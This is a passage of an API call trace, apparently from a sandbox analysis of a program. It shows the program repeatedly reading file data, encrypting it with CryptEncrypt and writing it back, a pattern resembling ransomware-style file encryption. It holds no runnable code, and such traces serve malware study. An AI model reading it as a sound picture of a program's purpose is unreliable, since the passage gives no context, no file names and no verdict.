lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.042] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.044] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.045] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.046] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.047] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 